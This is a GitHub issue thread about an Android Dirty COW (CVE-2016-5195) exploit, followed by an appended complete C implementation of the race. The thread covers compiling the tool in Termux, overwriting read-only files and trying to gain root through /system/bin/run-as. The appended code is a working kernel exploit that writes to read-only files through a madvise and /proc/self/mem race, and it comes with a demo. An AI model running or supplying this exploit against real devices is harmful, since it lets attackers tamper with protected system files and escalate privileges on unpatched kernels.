igrek51 / android-dirtycowy-exploit

Dirty Cow Exploit for Android allowing to overwrite read-only files based on linux kernel bug

how can i run it on android device? #1

Open MatanTubul opened 7 years ago

MatanTubul commented 7 years ago

I am trying to run it on termux but got the following error: error opening new_content_file

igrek51 commented 7 years ago

First, you should compile it for your device architecture. You can do that with gcc on termux:

  1. Install gcc on termux: apt install clang
  2. Compile dirtycowy.c (in src/ folder): gcc -pthread dirtycowy.c -o dirtycowy

Then you can run some test:

  1. Create some file which will be overwritten: echo 'readonly' > readonly
  2. Make it read-only (i.e. by root): chmod 444 readonly
  3. Check if it's read-only: ls -l readonly
  4. Create some file with new data which will overwrite the old file content: echo 'dirtdirt' > dirty-data
  5. Check the file content (you should see 'readonly'): cat readonly
  6. OVERWRITE: dirtycowy overwrite readonly dirtdirt
  7. Check the file content again (you should see 'dirtdirt'): cat readonly

MatanTubul commented 7 years ago

I already compiled it. After that I tried to run it on the "run-as" file that you provided, but then I got the error below.

  1. Can this program give me root access?
  2. Does it work on Android 7.0?

igrek51 commented 7 years ago

Take a look at some info about Dirty Cow; my program is based on one of these exploits: https://dirtycow.ninja/

  1. In theory yes: if you overwrite some system binary file (with the SUID flag) with your run-as binary (which sets the current user to root) and you execute it, it should give you root access. But on some devices (especially mine, a Samsung SM-G530) there wasn't any file with the SUID flag (which is necessary to escalate privileges). On my device I only succeeded in overwriting system configuration read-only files (which is also a powerful tool).

  2. It depends only on the Linux kernel version. This exploit should work only on kernels released before Oct 18, 2016. You can check your kernel version by entering in termux: cat /proc/version

MatanTubul commented 7 years ago

I have a Nexus 6P with Android 7.1.1 and kernel version 3.10.73.

igrek51 commented 7 years ago

Kernel 3.10.73 was released in March 2015, so your kernel is affected by the Dirty COW bug.

MatanTubul commented 7 years ago

Do you have any idea which system file I can overwrite? I get the following output:

Checking overwriting status on
[warn] new file size (9706) and old file size (0) differ
Uwaga, napierdalam dirty cow...
[ERROR] error opening new_content_file
.
.
.
igrek51 commented 7 years ago

I was trying to overwrite the file /system/bin/run-as, but as I said: I succeeded in overwriting it, but failed to switch to root when executing it. I have not solved this problem yet. This might have been a method to temporarily switch to root without permanently rooting the device (which voids the warranty). I thought that the Dirty Cow bug was a great chance to do that, but now I know it's not so easy, especially on every Android device.

The program dirtycowy overwrites files with new content, but both file sizes should be equal. However, there is a trick included which allows working with SLIGHTLY different file sizes (that's why there is a warning message). I suppose that in your case it failed because the overwritten file has no bytes to overwrite (size 0). Dirty Cow can overwrite existing bytes, not write or append any data to a file.

I advise you to read more about the Dirty COW mechanism and be careful what you do, especially when overwriting system files. The mysterious message Uwaga, napierdalam dirty cow... means Be careful, executing dirty cow...
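The readonly/dirtdirt test sequence from the second comment and the "existing bytes only" constraint from the last one, as an added C example that is not code from the igrek51/android-dirtycowy-exploit repository: it implements the two-thread race from the public dirtyc0w.c PoC linked above (one thread loops madvise(MADV_DONTNEED) on a private read-only mapping of the target, the other loops writes into that mapping through /proc/self/mem), guarded by a pre-check that refuses an empty target or a payload longer than the file, which is the case behind the "old file size (0)" warning in the output above. The function names, the 10,000,000-iteration default and the handling of shorter payloads (only the leading bytes are replaced; no attempt at the tool's trick for slightly different sizes) are this example's own choices. Build with gcc -pthread; on a kernel patched for CVE-2016-5195 the race simply never wins and the overwrite function reports -1.

```c
// Added example, not code from the igrek51/android-dirtycowy-exploit repo:
// the two-thread Dirty COW race (madvise(MADV_DONTNEED) vs. a write through
// /proc/self/mem) from the public dirtyc0w.c PoC, plus the size pre-check
// described above. Function and file names are this example's own choices.
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Dirty COW only flips bytes that already exist in the page cache; it cannot
 * grow a file. An empty target (old size 0, as in the output above) or a
 * payload longer than the target has to be refused before racing. */
int cow_size_check(size_t old_size, size_t new_size)
{
    if (old_size == 0) return -1;        /* nothing to overwrite */
    if (new_size > old_size) return -1;  /* would have to append */
    return 0;                            /* leading new_size bytes replaceable */
}

struct cow_job { void *map; const char *data; size_t len; long iterations; };

/* Thread A: keep discarding our private COW copy of the mapped page. */
static void *madvise_thread(void *arg)
{
    struct cow_job *j = arg;
    for (long i = 0; i < j->iterations; i++)
        madvise(j->map, j->len, MADV_DONTNEED);
    return NULL;
}

/* Thread B: keep forcing a write into the read-only mapping via
 * /proc/self/mem. On a vulnerable kernel the write occasionally lands on the
 * shared page-cache page instead of the private copy, dirtying the file. */
static void *proc_mem_thread(void *arg)
{
    struct cow_job *j = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) return NULL;
    for (long i = 0; i < j->iterations; i++)
        if (pwrite(fd, j->data, j->len, (off_t)(uintptr_t)j->map) < 0)
            continue;                    /* ignore transient errors, keep racing */
    close(fd);
    return NULL;
}

/* Overwrite the first `len` bytes of `path` with `data`. Returns 0 when a
 * fresh read of the file afterwards starts with `data`, -1 otherwise (on a
 * kernel patched for CVE-2016-5195 the race never wins, so expect -1). */
int dirtycow_overwrite(const char *path, const char *data, size_t len,
                       long iterations)
{
    struct stat st;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || cow_size_check((size_t)st.st_size, len) != 0) {
        close(fd);
        return -1;
    }
    void *map = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) { close(fd); return -1; }
    struct cow_job job = { map, data, len, iterations };
    pthread_t ta, tb;
    pthread_create(&ta, NULL, madvise_thread, &job);
    pthread_create(&tb, NULL, proc_mem_thread, &job);
    pthread_join(ta, NULL);
    pthread_join(tb, NULL);
    munmap(map, (size_t)st.st_size);
    close(fd);
    /* Verify through a fresh read, never through our own private mapping. */
    char *buf = malloc(len);
    int rfd = open(path, O_RDONLY);
    ssize_t n = (rfd < 0 || !buf) ? -1 : read(rfd, buf, len);
    if (rfd >= 0) close(rfd);
    int ok = (n == (ssize_t)len && memcmp(buf, data, len) == 0) ? 0 : -1;
    free(buf);
    return ok;
}

/* The check from the thread: a constructed 0444 file holding "readonly",
 * attacked with "dirtdirt" (same length, so the pre-check passes). */
int main(void)
{
    const char *target = "readonly";
    int fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0444);
    if (fd < 0) { perror("open"); return 1; }
    if (write(fd, "readonly", 8) != 8) { close(fd); return 1; }
    close(fd);
    chmod(target, 0444);                 /* no write permission for us */
    int rc = dirtycow_overwrite(target, "dirtdirt", 8, 10000000L);
    printf("%s: %s\n", target, rc == 0 ? "overwritten (kernel vulnerable)"
                                       : "unchanged (patched kernel or race lost)");
    return rc == 0 ? 0 : 2;
}
```

The pre-check is what separates the "size 0" failure in the output above from a genuine race loss: an empty page cache has no bytes for the race to flip, so the tool bails out before even starting. Note that the verification step re-reads the file through a new descriptor; reading back through the MAP_PRIVATE mapping would show the payload on every kernel, patched or not, because that is exactly the private copy the COW break is supposed to hand you.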